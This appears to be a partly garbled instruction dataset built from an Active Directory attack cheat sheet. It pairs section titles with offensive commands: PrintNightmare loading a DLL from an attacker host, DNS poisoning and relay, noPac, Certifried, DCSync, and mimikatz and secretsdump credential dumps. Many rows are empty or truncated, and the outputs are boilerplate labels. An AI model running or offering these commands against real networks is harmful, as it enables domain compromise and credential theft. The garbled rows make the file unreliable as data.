| {: , : , : } |
| {: , : , : } |
| {: , : , : } |
| {: , : , : } |
| {: , : , : } |
| {: , : , : } |
| {: , : , : } |
| {: , : , : } |
| {: , : , : } |
| {: , : , : } |
| {: , : , : } |
| {: , : , : } |
| {: , : , : } |
| {: , : , : } |
| {: , : , : } |
| {: , : , : } |
| {: , : , : } |
| {: , : , : } |
| {: , : , : } |
| {: , : , : } |
| {: , : , : } |
| {: , : krb5-enum-users.realm='<domain>',userdb=<user_list_file>\, : } |
| {: , : , : } |
| {: , : , : } |
| {: , : , : } |
| {: , : , : } |
| {: , : , : } |
| {: , : , : } |
| {: , : , : } |
| {: , : , : } |
| {: , : , : } |
| {: , : , : } |
| {: , : , : } |
| {: , : , : } |
| {: , : \\xxx\\boot.var\, : } |
| {: , : , : } |
| {: , : , : } |
| {: , : , : } |
| {: , : , : } |
| {: , : , : } |
| {: , : , : } |
| {: , : , : } |
| {: , : , : } |
| {: , : , : } |
| {: , : , : } |
| {: , : , : } |
| {: , : , : } |
| {: , : , : } |
| {: , : , : } |
| {: , : , : } |
| {: , : , : } |
| {: , : , : } |
| {: , : , : } |
| {: , : , : } |
| {: , : , : } |
| {: , : , : } |
| {: , : , : } |
| {: , : , : } |
| {: , : , : } |
| {: , : , : } |
| {: , : , : } |
| {: , : , : } |
| {: , : , : } |
| {: , : , : } |
| {: , : , : } |
| {: , : , : } |
| {: , : , : } |
| {: , : , : } |
| {: , : , : } |
| {: , : , : } |
| {: , : , : } |
| {: , : , : } |
| {: , : , : } |
| {: , : , : } |
| {: , : , : } |
| {: , : , : } |
| {: , : , : } |
| {: , : , : } |
| {: , : , : } |
| {: , : , : } |
| {: , : , : } |
| {: , : , : } |
| {: , : , : } |
| {: , : , : } |
| {: , : , : } |
| {: , : , : } |
| {: , : , : } |
| {: , : , : } |
| {: , : <asrep_user>\<user_list.txt>\<dc_ip>\<domain>\, : } |
| {: , : , : } |
| {: , : , : } |
| {: , : , : } |
| {: , : , : } |
| {: , : , : } |
| {: , : , : } |
| {: , : , : } |
| {: , : , : } |
| {: , : , : } |
| {: , : , : } |
| {: , : , : } |
| {: , : , : } |
| {: , : , : } |
| {: , : , : } |
| {: , : , : } |
| {: , : , : } |
| {: , : , : } |
| {: , : , : } |
| {: , : , : } |
| {: , : , : } |
| {: , : , : } |
| {: , : , : } |
| {: , : , : } |
| {: , : , : } |
| {: , : , : } |
| {: , : , : } |
| {: , : , : } |
| {: , : , : } |
| {: , : , : } |
| {: , : , : } |
| {: , : , : } |
| {: , : , : } |
| {: , : , : } |
| {: , : , : } |
| {: , : , : } |
| {: , : , : } |
| {: , : , : } |
| {: , : , : } |
| {: , : , : } |
| {: , : , : } |
| {: , : , : } |
| {: , : , : } |
| {: , : , : } |
| {: , : , : } |
| {: , : , : } |
| {: , : , : } |
| {: , : , : } |
| {: , : , : } |
| {: , : , : } |
| {: , : , : } |
| {: , : , : } |
| {: , : , : } |
| {: , : , : } |
| {: , : , : } |
| {: , : , : } |
| {: , : , : } |
| {: , : , : } |
| {: , : , : } |
| {: , : , : } |
| {: , : , : } |
| {: , : , : } |
| {: , : , : } |
| {: , : , : } |
| {: , : , : } |
| {: , : , : } |
| {: , : , : } |
| {: , : , : } |
| {: , : , : } |
| {: , : , : } |
| {: , : , : } |
| {: , : , : } |
| {: , : <password>\, : } |
| {: , : , : } |
| {: , : , : } |
| {: , : , : } |
| {: , : , : } |
| {: , : , : } |
| {: , : , : } |
| {: , : , : } |
| {: , : , : } |
| {: , : , : } |
| {: , : , : } |
| {: , : , : } |
| {: , : , : } |
| {: , : , : } |
| {: , : , : } |
| {: , : , : } |
| {: , : , : } |
| {: , : , : } |
| {: , : , : } |
| {: , : , : } |
| {: , : , : } |
| {: , : , : } |
| {: , : , : } |
| {: , : , : } |
| {: , : , : } |
| {: , : , : } |
| {: , : , : } |
| {: , : , : } |
| {: , : , : } |
| {: , : , : } |
| {: , : , : } |
| {: , : , : } |
| {: , : , : } |
| {: , : , : } |
| {: , : <domain>\\<user>\<attacker_ip>\<dns_server_ip>\<servername>1UWhRCAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAYBAAAA\, : } |
| {: , : , : } |
| {: , : , : } |
| {: , : , : } |
| {: , : , : } |
| {: , : , : } |
| {: , : , : } |
| {: , : , : } |
| {: , : , : } |
| {: , : , : } |
| {: , : , : } |
| {: , : , : } |
| {: , : , : } |
| {: , : , : } |
| {: , : , : } |
| {: , : , : } |
| {: , : , : } |
| {: , : , : } |
| {: , : outputNote or procedural step under 'Auto Enum'. |
| instructionSearch filesinputfindstr /si 'pass' *.txt *.xml *.docx *.inioutputNote or procedural step under 'Search files'. |
| instructionExploitinputSMBGhost CVE-2020-0796outputReference to a known vulnerability or advisory; consult vendor advisories and patching guidance. |
| instructionExploitinputCVE-2021-36934 (HiveNightmare/SeriousSAM)outputReference to a known vulnerability or advisory; consult vendor advisories and patching guidance. |
| instructionExploitinputvssadmin list shadowsoutputNote or procedural step under 'Exploit'. |
| instructionWebdavinputopen file <file>.searchConnector-msoutputNote or procedural step under 'Webdav'. |
| instructionWebdavinputdnstool.py -u <domain>\\<user> -p <pass> --record 'attacker' --action add --data <ip_attacker> <dc_ip>outputNote or procedural step under 'Webdav'. |
| instructionWebdavinputpetitpotam.py -u '<user>' -p <pass> -d '<domain>' \ <ip>outputNote or procedural step under 'Webdav'. |
| instructionKerberos RelayinputKrbRelayUp.exe relay -Domain <domain> -CreateNewComputerAccount -ComputerName <computer$> -ComputerPassword <password>outputNote or procedural step under 'Kerberos Relay'. |
| instructionKerberos RelayinputKrbRelayUp.exe spawn -m rbcd -d <domain> -dc <dc> -cn <computer_name>-cp <omputer_pass>outputNote or procedural step under 'Kerberos Relay'. |
| instructionFrom Service account (SEImpersonate)inputRoguePatatooutputNote or procedural step under 'From Service account (SEImpersonate)'. |
| instructionFrom Service account (SEImpersonate)inputGodPotatooutputNote or procedural step under 'From Service account (SEImpersonate)'. |
| instructionFrom Service account (SEImpersonate)inputPrintSpooferoutputNote or procedural step under 'From Service account (SEImpersonate)'. |
| instructionFrom Service account (SEImpersonate)inputRemotePotato0outputNote or procedural step under 'From Service account (SEImpersonate)'. |
| instructionMS14-068inputfindSMB2UPTime.py <ip>outputNote or procedural step under 'MS14-068'. |
| instructionMS14-068inputms14-068.py -u <user>@<domain> -p <password> -s <user_sid> -d <dc_fqdn>outputReference to a known vulnerability or advisory; consult vendor advisories and patching guidance. |
| instructionMS14-068inputmsf> use auxiliary/admin/kerberos/ms14_068_kerberos_checksumoutputTool or command referenced under 'MS14-068'. |
| instructionMS14-068inputgoldenPac.py -dc-ip <dc_ip> <domain>/<user>:<password>@targetoutputNote or procedural step under 'MS14-068'. |
| instructionGPP MS14-025inputmsf> use auxiliary/scanner/smb/smb_enum_gppoutputTool or command referenced under 'GPP MS14-025'. |
| instructionGPP MS14-025inputfindstr /S /I cpassword \\\\<domain_fqdn>\\sysvol\\<domain_fqdn>\\policies\\*.xmloutputNote or procedural step under 'GPP MS14-025'. |
| instructionGPP MS14-025inputGet-GPPPassword.py <domain>/<user>:<password>@<dc_fqdn>outputNote or procedural step under 'GPP MS14-025'. |
| instructionPrivExchange (CVE-2019-0724, CVE-2019-0686)inputprivexchange.py -ah <attacker_ip> <exchange_host> -u <user> -d <domain> -p <password>outputNote or procedural step under 'PrivExchange (CVE-2019-0724, CVE-2019-0686)'. |
| instructionnoPac (CVE-2021-42287, CVE-2021-42278)inputnxc smb <ip> -u 'user' -p 'pass' -M nopac #scanoutputNetExec-like tool invocation for SMB/LDAP/MSSQL and other probes. |
| instructionnoPac (CVE-2021-42287, CVE-2021-42278)inputnoPac.exe -domain <domain> -user <user> -pass <password> /dc <dc_fqdn> /mAccount <machine_account> /mPassword <machine_password> /service cifs /pttoutputNote or procedural step under 'noPac (CVE-2021-42287, CVE-2021-42278)'. |
| instructionPrintNightmare (CVE-2021-1675, CVE-2021-34527)inputnxc smb <ip> -u 'user' -p 'pass' -M printnightmare #scanoutputNetExec-like tool invocation for SMB/LDAP/MSSQL and other probes. |
| instructionPrintNightmare (CVE-2021-1675, CVE-2021-34527)inputprintnightmare.py -dll '\\\\<attacker_ip>\\smb\\add_user.dll' '<user>:<password>@<ip>", "output": "Note or procedural step under 'PrintNightmare (CVE-2021-1675, CVE-2021-34527)'."} |
| {"instruction": "Certifried (CVE-2022-26923)", "input": "Create account", "output": "Note or procedural step under 'Certifried (CVE-2022-26923)'."} |
| {"instruction": "Certifried (CVE-2022-26923)", "input": "certipy account create -u <user>@<domain> -p '<password>' -user 'certifriedpc' -pass 'certifriedpass' -dns '<fqdn_dc>'", "output": "Note or procedural step under 'Certifried (CVE-2022-26923)'."} |
| {"instruction": "Certifried (CVE-2022-26923)", "input": "Request", "output": "Note or procedural step under 'Certifried (CVE-2022-26923)'."} |
| {"instruction": "Certifried (CVE-2022-26923)", "input": "certipy req -u 'certifriedpc$'@<domain> -p 'certifriedpass' -target <ca_fqdn> -ca <ca_name> -template MachineoutputNote or procedural step under 'Certifried (CVE-2022-26923)'. |
| instructionCertifried (CVE-2022-26923)inputAuthenticationoutputNote or procedural step under 'Certifried (CVE-2022-26923)'. |
| instructionCertifried (CVE-2022-26923)inputcertipy auth -pfx <pfx_file> -username '<dc>$' -domain <domain> -dc-ip <dc_ip>outputNote or procedural step under 'Certifried (CVE-2022-26923)'. |
| instructionProxyNotShell (CVE-2022-41040, CVE-2022-41082)inputpoc_aug3.py <host> <username> <password> <command>outputNote or procedural step under 'ProxyNotShell (CVE-2022-41040, CVE-2022-41082)'. |
| instructionProxyNotShell (CVE-2022-41040, CVE-2022-41082)inputACLs/ACEs permissionsoutputNote or procedural step under 'ProxyNotShell (CVE-2022-41040, CVE-2022-41082)'. |
| instructionDcsyncinputAdministrators, Domain Admins, or Enterprise Admins as well as Domain Controller computer accountsoutputNote or procedural step under 'Dcsync'. |
| instructionDcsyncinputmimikatz lsadump::dcsync /domain:<target_domain> /user:<target_domain>\\administratoroutputCredential extraction or secrets dumping referenced; handle in lab and follow legal constraints. |
| instructionDcsyncinputsecretsdump.py '<domain>'/'<user>':'<password>'@'<domain_controller>'outputCredential extraction or secrets dumping referenced; handle in lab and follow legal constraints. |
| instructionCan change msDS-KeyCredentialLInk (Generic Write) + ADCSinputShadow CredentialsoutputNote or procedural step under 'Can change msDS-KeyCredentialLInk (Generic Write) + ADCS'. |
| instructionCan change msDS-KeyCredentialLInk (Generic Write) + ADCSinputcertipy shadow auto '-u <user>@<domain>' -p <password> -account '<target_account>'outputNote or procedural step under 'Can change msDS-KeyCredentialLInk (Generic Write) + ADCS'. |
| instructionCan change msDS-KeyCredentialLInk (Generic Write) + ADCSinputpywhisker.py -d \ -u \ -p \ --target \ --action \outputNote or procedural step under 'Can change msDS-KeyCredentialLInk (Generic Write) + ADCS'. |
| instructionOn GroupinputGenericAll/GenericWrite/Self/Add Extended RightsoutputNote or procedural step under 'On Group'. |
| instructionOn GroupinputAdd member to the groupoutputNote or procedural step under 'On Group'. |
| instructionOn GroupinputWrite OwneroutputNote or procedural step under 'On Group'. |
| instructionOn GroupinputGrant OwnershipoutputNote or procedural step under 'On Group'. |
| instructionOn GroupinputWriteDACL + WriteOwneroutputNote or procedural step under 'On Group'. |
| instructionOn GroupinputGrant rightsoutputNote or procedural step under 'On Group'. |
| instructionOn GroupinputGive yourself generic alloutputNote or procedural step under 'On Group'. |
| instructionOn ComputerinputGenericAll / GenericWriteoutputNote or procedural step under 'On Computer'. |
| instructionOn ComputerinputmsDs-AllowedToActOnBehalfoutputNote or procedural step under 'On Computer'. |
| instructionOn Computerinputadd Key CredentialsoutputNote or procedural step under 'On Computer'. |
| instructionOn UserinputGenericAll / GenericWriteoutputNote or procedural step under 'On User'. |
| instructionOn UserinputChange passwordoutputNote or procedural step under 'On User'. |
| instructionOn Userinputadd SPN (target kerberoasting)outputNote or procedural step under 'On User'. |
| instructionOn Userinputadd key credentialsoutputNote or procedural step under 'On User'. |
| instructionOn Userinputlogin scriptoutputNote or procedural step under 'On User'. |
| instructionOn UserinputForceChangePasswordoutputNote or procedural step under 'On User'. |
| instructionOn Userinputnet user <user> <password> /domainoutputNote or procedural step under 'On User'. |
| instructionOn OUinputWrite DacloutputNote or procedural step under 'On OU'. |
| instructionOn OUinputACE InheritanceoutputNote or procedural step under 'On OU'. |
| instructionOn OUinputGrant rightsoutputNote or procedural step under 'On OU'. |
| instructionOn OUinputGenericAll / GenericWrite / Manage Group Policy LinksoutputNote or procedural step under 'On OU'. |
| instructionOn OUinputOUned.py --config config.inioutputNote or procedural step under 'On OU'. |
| instructionReadGMSAPasswordinputgMSADumper.py -u '<user>' -p '<password>' -d '<domain>'outputNote or procedural step under 'ReadGMSAPassword'. |
| instructionReadGMSAPasswordinputnxc ldap <ip> -u <user> -p <pass> --gmsaoutputNetExec-like tool invocation for SMB/LDAP/MSSQL and other probes. |
| instructionReadGMSAPasswordinputldeep ldap -u <user> -p <password> -d <domain> -s ldaps://<dc_ip> gmsaoutputNote or procedural step under 'ReadGMSAPassword'. |
| instructionGet LAPS passwordsinputWho can read LAPSoutputNote or procedural step under 'Get LAPS passwords'. |
| instructionGet LAPS passwordsinputMATCH p=(g:Base)-[:ReadLAPSPassword]->(c:Computer) RETURN poutputNote or procedural step under 'Get LAPS passwords'. |
| instructionGet LAPS passwordsinputRead LAPSoutputNote or procedural step under 'Get LAPS passwords'. |
| instructionGet LAPS passwordsinputGet-LapsADPassword -DomainController <ip_dc> -Credential <domain>\\<login> | Format-Table -AutoSizeoutputNote or procedural step under 'Get LAPS passwords'. |
| instructionGet LAPS passwordsinputldeep ldap -u <user> -p <password> -d <domain> -s ldap://<dc_ip> lapsoutputNote or procedural step under 'Get LAPS passwords'. |
| instructionGet LAPS passwordsinputforeach ($objResult in $colResults){$objComputer = $objResult.Properties; $objComputer.name|where {$objcomputer.name -ne $env:computername}|%{foreach-object {Get-AdmPwdPassword -ComputerName $_}}}outputNote or procedural step under 'Get LAPS passwords'. |
| instructionGet LAPS passwordsinputnxc ldap <dc_ip> -d <domain> -u <user> -p <password> --module lapsoutputNetExec-like tool invocation for SMB/LDAP/MSSQL and other probes. |
| instructionGet LAPS passwordsinputmsf> use post/windows/gather/credentials/enum_lapsoutputTool or command referenced under 'Get LAPS passwords'. |
| instructionGPOinputWho can control GPOsoutputNote or procedural step under 'GPO'. |
| instructionGPOinputMATCH p=((n:Base)-[]->(gp:GPO)) RETURN poutputNote or procedural step under 'GPO'. |
| instructionGPOinputSID of principals that can create new GPOs in the domainoutputNote or procedural step under 'GPO'. |
| instructionGPOinputGet-DomainObjectAcl -SearchBase \ -ResolveGUIDs | ? { $_.ObjectAceType -eq \ } | select ObjectDN, ActiveDirectoryRights, SecurityIdentifier | floutputNote or procedural step under 'GPO'. |
| instructionGPOinputReturn the principals that can write to the GP-Link attribute on OUsoutputNote or procedural step under 'GPO'. |
| instructionGPOinputGet-DomainOU | Get-DomainObjectAcl -ResolveGUIDs | ? { $_.ObjectAceType -eq \ -and $_.ActiveDirectoryRights -match \ } | select ObjectDN, SecurityIdentifier | floutputNote or procedural step under 'GPO'. |
| instructionGPOinputGeneric Write on GPOoutputNote or procedural step under 'GPO'. |
| instructionGPOinputAbuse GPOoutputNote or procedural step under 'GPO'. |
| instructionDNS AdmininputDNSadmins abuse (CVE-2021-40469)outputReference to a known vulnerability or advisory; consult vendor advisories and patching guidance. |
| instructionDNS Admininputdnscmd.exe /config /serverlevelplugindll <\\\\path\\to\\dll> # need a dnsadmin useroutputNote or procedural step under 'DNS Admin'. |
| instructionDNS Admininputsc \\\\DNSServer stop dns sc \\\\DNSServer start dnsoutputNote or procedural step under 'DNS Admin'. |
| instructionFind delegationinputfindDelegation.py \/\:\outputNote or procedural step under 'Find delegation'. |
| instructionFind delegationinputWith BloodHoundoutputNote or procedural step under 'Find delegation'. |
| instructionFind delegationinputUnconstrainedoutputNote or procedural step under 'Find delegation'. |
| instructionFind delegationinputMATCH (c:Computer {unconstraineddelegation:true}) RETURN coutputNote or procedural step under 'Find delegation'. |
| instructionFind delegationinputMATCH (c:User {unconstraineddelegation:true}) RETURN coutputNote or procedural step under 'Find delegation'. |
| instructionFind delegationinputConstrainedoutputNote or procedural step under 'Find delegation'. |
| instructionFind delegationinputMATCH p=((c:Base)-[:AllowedToDelegate]->(t:Computer)) RETURN poutputNote or procedural step under 'Find delegation'. |
| instructionFind delegationinputMATCH p=shortestPath((u:User)-[*1..]->(c:Computer {name: \})) RETURN poutputNote or procedural step under 'Find delegation'. |
| instructionUnconstrained delegationinputUAC: ADS_UF_TRUSTED_FOR_DELEGATIONoutputNote or procedural step under 'Unconstrained delegation'. |
| instructionUnconstrained delegationinputForce connection with coerceoutputNote or procedural step under 'Unconstrained delegation'. |
| instructionUnconstrained delegationinputGet ticketsoutputNote or procedural step under 'Unconstrained delegation'. |
| instructionUnconstrained delegationinputmimikatz privilege::debug sekurlsa::tickets /export sekurlsa::tickets /exportoutputCredential extraction or secrets dumping referenced; handle in lab and follow legal constraints. |
| instructionUnconstrained delegationinputRubeus.exe dump /service:krbtgt /nowrapoutputTool or command referenced under 'Unconstrained delegation'. |
| instructionUnconstrained delegationinputRubeus.exe dump /luid:0xdeadbeef /nowrapoutputTool or command referenced under 'Unconstrained delegation'. |
| instructionUnconstrained delegationinputRubeus.exe monitor /interval:5outputTool or command referenced under 'Unconstrained delegation'. |
| instructionConstrained delegationinputWith protocol transition (any) UAC: TRUST_TO_AUTH_FOR_DELEGATIONoutputNote or procedural step under 'Constrained delegation'. |
| instructionConstrained delegationinputGet TGT for useroutputNote or procedural step under 'Constrained delegation'. |
| instructionConstrained delegationinputRequest S4u2selfoutputNote or procedural step under 'Constrained delegation'. |
| instructionConstrained delegationinputRequest S4u2proxyoutputNote or procedural step under 'Constrained delegation'. |
| instructionConstrained delegationinputRubeus.exe hash /password:<password>outputTool or command referenced under 'Constrained delegation'. |
| instructionConstrained delegationinputRubeus.exe asktgt /user:<user> /domain:<domain> /aes256:<AES 256 hash>outputTool or command referenced under 'Constrained delegation'. |
| instructionConstrained delegationinputRubeus.exe s4u /ticket:<ticket> /impersonateuser:<admin_user> /msdsspn:<spn_constrained> /altservice:<altservice> /pttoutputTool or command referenced under 'Constrained delegation'. |
| instructionConstrained delegationinputAltservice HTTP/HOST/CIFS/LDAPoutputNote or procedural step under 'Constrained delegation'. |
| instructionConstrained delegationinputgetST.py -spn '<spn>/<target>' -impersonate Administrator -dc-ip '<dc_ip>' '<domain>/<user>:<password>' -altservice <altservice>outputNote or procedural step under 'Constrained delegation'. |
| instructionConstrained delegationinputAltservice HTTP/HOST/CIFS/LDAPoutputNote or procedural step under 'Constrained delegation'. |
| instructionConstrained delegationinputWithout protocol transition (kerberos only) UAC: TRUSTED_FOR_DELEGATIONoutputNote or procedural step under 'Constrained delegation'. |
| instructionConstrained delegationinputConstrain between Y and ZoutputNote or procedural step under 'Constrained delegation'. |
| instructionConstrained delegationinputAdd computer XoutputNote or procedural step under 'Constrained delegation'. |
| instructionConstrained delegationinputAdd RBCD : delegate from X to YoutputNote or procedural step under 'Constrained delegation'. |
| instructionConstrained delegationinputs4u2self X (impersonate admin)outputNote or procedural step under 'Constrained delegation'. |
| instructionConstrained delegationinputS4u2Proxy X (impersonate admin on spn/Y)outputNote or procedural step under 'Constrained delegation'. |
| instructionConstrained delegationinputForwardable TGS for YoutputNote or procedural step under 'Constrained delegation'. |
| instructionConstrained delegationinputS4u2Proxy Y (impersonate admin on spn/Z)outputNote or procedural step under 'Constrained delegation'. |
| instructionConstrained delegationinputadd computer accountoutputNote or procedural step under 'Constrained delegation'. |
| instructionConstrained delegationinputaddcomputer.py -computer-name '<computer_name>' -computer-pass '<ComputerPassword>' -dc-host <dc> -domain-netbios <domain_netbios> '<domain>/<user>:<password>'outputNote or procedural step under 'Constrained delegation'. |
| instructionConstrained delegationinputRBCD With added computer accountoutputNote or procedural step under 'Constrained delegation'. |
| instructionConstrained delegationinputrbcd.py -delegate-from '<rbcd_con>$' -delegate-to '<constrained>$' -dc-ip '<dc>' -action 'write' -hashes '<hash>' <domain>/<constrained>$", : } |
| {: , : , : } |
| {: , : , : } |
| {: , : , : } |
| {: , : , : } |
| {: , : , : } |
| {: , : , : } |
| {: , : , : } |
| {: , : , : } |
| {: , : , : } |
| {: , : , : } |
| {: , : , : } |
| {: , : , : } |
| {: , : , : } |
| {: , : <dc_ip>\<machine_hash>\<domain>\<machine>$\, : } |
| {: , : <admin>\cifs/<machine>\DomainController\<domain>\, : } |
| {: , : , : } |
| {: , : , : } |
| {: , : , : } |
| {: , : , : } |
| {: , : , : } |
| {: , : , : } |
| {: , : , : } |
| {: , : , : } |
| {: , : , : } |
| {: , : , : } |
| {: , : , : } |
| {: , : , : } |
| {: , : , : } |
| {: , : , : } |
| {: , : , : } |
| {: , : , : } |
| {: , : , : } |
| {: , : <vulnerable template name>\Admin\, : } |
| {: , : , : } |
| {: , : , : } |
| {: , : , : } |
| {: , : <vulnerable template name>\, : } |
| {: , : , : } |
| {: , : , : } |
| {: , : , : } |
| {: , : , : } |
| {: , : , : } |
| {: , : <vulnerable template name>\, : } |
| {: , : , : } |
| {: , : , : } |
| {: , : , : } |
| {: , : , : } |
| {: , : , : } |
| {: , : , : } |
| {: , : , : } |
| {: , : , : } |
| {: , : , : } |
| {: , : , : } |
| {: , : , : } |
| {: , : , : } |
| {: , : , : } |
| {: , : , : } |
| {: , : , : } |
| {: , : , : } |
| {: , : , : } |
| {: , : , : } |
| {: , : , : } |
| {: , : , : } |
| {: , : , : } |
| {: , : , : } |
| {: , : , : } |
| {: , : , : } |
| {: , : , : } |
| {: , : , : } |
| {: , : , : } |
| {: , : , : } |
| {: , : , : } |
| {: , : , : } |
| {: , : , : } |
| {: , : , : } |
| {: , : , : } |
| {: , : , : } |
| {: , : , : } |
| {: , : , : } |
| {: , : , : } |
| {: , : , : } |
| {: , : , : } |
| {: , : , : } |
| {: , : , : } |
| {: , : , : } |
| {: , : , : } |
| {: , : , : } |
| {: , : , : } |
| {: , : , : } |
| {: , : , : } |
| {: , : , : } |
| {: , : , : } |
| {: , : , : } |
| {: , : , : } |
| {: , : , : } |
| {: , : , : } |
| {: , : , : } |
| {: , : , : } |
| {: , : , : } |
| {: , : , : } |
| {: , : , : } |
| {: , : , : } |
| {: , : , : } |
| {: , : , : } |
| {: , : , : } |
| {: , : , : } |
| {: , : , : } |
| {: , : , : } |
| {: , : , : } |
| {: , : , : } |
| {: , : , : } |
| {: , : , : } |
| {: , : , : } |
| {: , : , : } |
| {: , : , : } |
| {: , : , : } |
| {: , : , : } |
| {: , : , : } |
| {: , : , : } |
| {: , : , : } |
| {: , : , : } |
| {: , : , : } |
| {: , : , : } |
| {: , : <query>\, : } |
| {: , : , : } |
| {: , : , : } |
| {: , : , : } |
| {: , : , : } |
| {: , : , : } |
| {: , : , : } |
| {: , : , : } |
| {: , : , : } |
| {: , : , : } |
| {: , : , : } |
| {: , : , : } |
| {: , : outputNote or procedural step under 'Creds-2:Policy Request Credentials Simple user'. |
| instructionCreds-2:Policy Request Credentials Simple userinputcleanup #User + PassoutputNote or procedural step under 'Creds-2:Policy Request Credentials Simple user'. |
| instructionCreds-3Creds-4 Computer Admin userinputdploot.py sccm -u <admin> -p '<password>' <sccm_target> #NAA credentialsoutputNote or procedural step under 'Creds-3Creds-4 Computer Admin user'. |
| instructionCreds-3Creds-4 Computer Admin userinputsccmhunter.py dpapi -u <admin> -p '<password>' -target <sccm_target> -debug #NAA credentialsoutputNote or procedural step under 'Creds-3Creds-4 Computer Admin user'. |
| instructionCreds-3Creds-4 Computer Admin userinputSharpSCCM.exe local secrets -m disk #NAA credentialsoutputNote or procedural step under 'Creds-3Creds-4 Computer Admin user'. |
| instructionCreds-3Creds-4 Computer Admin userinputSharpSCCM.exe local secrets -m wmi #NAA credentialsoutputNote or procedural step under 'Creds-3Creds-4 Computer Admin user'. |
| instructionCreds-5 SCCM admininputsecretsdump.py <domain>/<admin>:'<pass>'@<sccm_target>outputCredential extraction or secrets dumping referenced; handle in lab and follow legal constraints. |
| instructionCreds-5 SCCM admininputmssqlclient.py -windows-auth -hashes '<sccm_target_hashNT>' '<domain>/<sccm_target>$'@<sccm_mssql>outputNote or procedural step under 'Creds-5 SCCM admin'. |
| instructionCreds-5 SCCM admininputuse CM_<site_code>;outputNote or procedural step under 'Creds-5 SCCM admin'. |
| instructionCreds-5 SCCM admininputSELECT * FROM SC_UserAccount;outputNote or procedural step under 'Creds-5 SCCM admin'. |
| instructionCreds-5 SCCM admininputsccmdecryptpoc.exe <cyphered_value> #Site DB credentialsoutputNote or procedural step under 'Creds-5 SCCM admin'. |
| instructionCreds-5 SCCM admininputget_device <hostname>outputNote or procedural step under 'Creds-5 SCCM admin'. |
| instructionCreds-5 SCCM admininputinteract <device_id>outputNote or procedural step under 'Creds-5 SCCM admin'. |
| instructionCreds-5 SCCM admininputscript xploit.ps1 #Site DB credentialsoutputNote or procedural step under 'Creds-5 SCCM admin'. |
| instructionCreds-5 SCCM admininputEXEC-1/2 SCCM adminoutputNote or procedural step under 'Creds-5 SCCM admin'. |
| instructionCreds-5 SCCM admininputSharpSCCM.exe exec -p <binary> -d <device_name> -sms <SMS_PROVIDER> -sc <SITECODE> --no-banner #latoutputNote or procedural step under 'Creds-5 SCCM admin'. |
| instructionCreds-5 SCCM admininputsccmhunter.py admin -u <user>@<domain> -p '<password>' -ip <sccm_ip> #latoutputNote or procedural step under 'Creds-5 SCCM admin'. |
| instructionCleanupinputSharpSCCM.exe get devices -sms <SMS_PROVIDER> -sc <SITECODE> -n <NTLMRELAYX_LISTENER_IP> -p \ -p \ -p \outputNote or procedural step under 'Cleanup'. |
| instructionCleanupinputSharpSCCM.exe remove device GUID:<GUID> -sms <SMS_PROVIDER> -sc <SITECODE>outputNote or procedural step under 'Cleanup'. |
| instructionPost exploitinputas sccm adminoutputNote or procedural step under 'Post exploit'. |
| instructionPost exploitinputSCCMHound.exe --server <server> --sitecode <sitecode>outputNote or procedural step under 'Post exploit'. |
| instructionPost exploitinputUsers sessionsoutputNote or procedural step under 'Post exploit'. |
| instructionAdmin accessinputExtract credentials from LSASS.exeoutputNote or procedural step under 'Admin access'. |
| instructionAdmin accessinputLSASS as protected processoutputNote or procedural step under 'Admin access'. |
| instructionAdmin accessinputPPLdump64.exe <lsass.exe|lsass_pid> lsass.dmp #before 2022-07-22 updateoutputNote or procedural step under 'Admin access'. |
| instructionAdmin accessinputmimikatz \ \ \ \ \ \ \outputCredential extraction or secrets dumping referenced; handle in lab and follow legal constraints. |
| instructionAdmin accessinputExtract LSASS secretsoutputNote or procedural step under 'Admin access'. |
| instructionAdmin accessinputprocdump.exe -accepteula -ma lsass.exe lsass.dmpoutputNote or procedural step under 'Admin access'. |
| instructionAdmin accessinputmimikatz \ \ \ \outputCredential extraction or secrets dumping referenced; handle in lab and follow legal constraints. |
| instructionAdmin accessinputmsf> load kiwi creds_alloutputTool or command referenced under 'Admin access'. |
| instructionAdmin accessinputnxc smb <ip_range> -u <user> -p <password> -M lsassyoutputNetExec-like tool invocation for SMB/LDAP/MSSQL and other probes. |
| instructionAdmin accessinputlsassy -d <domain> -u <user> -p <password> <ip>outputNote or procedural step under 'Admin access'. |
| instructionExtract credentials from SAMinputnxc smb <ip_range> -u <user> -p <password> --samoutputNetExec-like tool invocation for SMB/LDAP/MSSQL and other probes. |
| instructionExtract credentials from SAMinputmsf> hashdumpoutputTool or command referenced under 'Extract credentials from SAM'. |
| instructionExtract credentials from SAMinputmimikatz \ \ \outputCredential extraction or secrets dumping referenced; handle in lab and follow legal constraints. |
| instructionExtract credentials from SAMinputsecretsdump.py <domain>/<user>:<password>@<ip>outputCredential extraction or secrets dumping referenced; handle in lab and follow legal constraints. |
| instructionExtract credentials from SAMinputreg save HKLM\\SAM <file>; reg save HKLM\\SYSTEM <file>outputNote or procedural step under 'Extract credentials from SAM'. |
| instructionExtract credentials from SAMinputsecretsdump.py -system SYSTEM -sam SAM LOCALoutputCredential extraction or secrets dumping referenced; handle in lab and follow legal constraints. |
| instructionExtract credentials from SAMinputreg.py <domain>/<user>:<password>@<ip> backup -o '\\\\<smb_ip>\\share'outputNote or procedural step under 'Extract credentials from SAM'. |
| instructionExtract credentials from SAMinputsecretsdump.py -system SYSTEM -sam SAM LOCALoutputCredential extraction or secrets dumping referenced; handle in lab and follow legal constraints. |
| instructionExtract credentials from SAMinputregsecrets.py <domain>/<user>:<password>@<ip>outputNote or procedural step under 'Extract credentials from SAM'. |
| instructionExtract credentials from LSAinputnxc smb <ip_range> -u <user> -p <password> --lsaoutputNetExec-like tool invocation for SMB/LDAP/MSSQL and other probes. |
| instructionExtract credentials from LSAinputmimikatz \ \ \outputCredential extraction or secrets dumping referenced; handle in lab and follow legal constraints. |
| instructionExtract credentials from LSAinputreg save HKLM\\SECURITY <file>; reg save HKLM\\SYSTEM <file>outputNote or procedural step under 'Extract credentials from LSA'. |
| instructionExtract credentials from LSAinputsecretsdump.py -system SYSTEM -security SECURITYoutputCredential extraction or secrets dumping referenced; handle in lab and follow legal constraints. |
| instructionExtract credentials from LSAinputreg.py <domain>/<user>:<password>@<ip> backup -o '\\\\<smb_ip>\\share'outputNote or procedural step under 'Extract credentials from LSA'. |
| instructionExtract credentials from DPAPIinputDPAPIoutputNote or procedural step under 'Extract credentials from DPAPI'. |
| instructionExtract credentials from DPAPIinputnxc smb <ip_range> -u <user> -p <password> --dpapi [cookies] [nosystem]outputNetExec-like tool invocation for SMB/LDAP/MSSQL and other probes. |
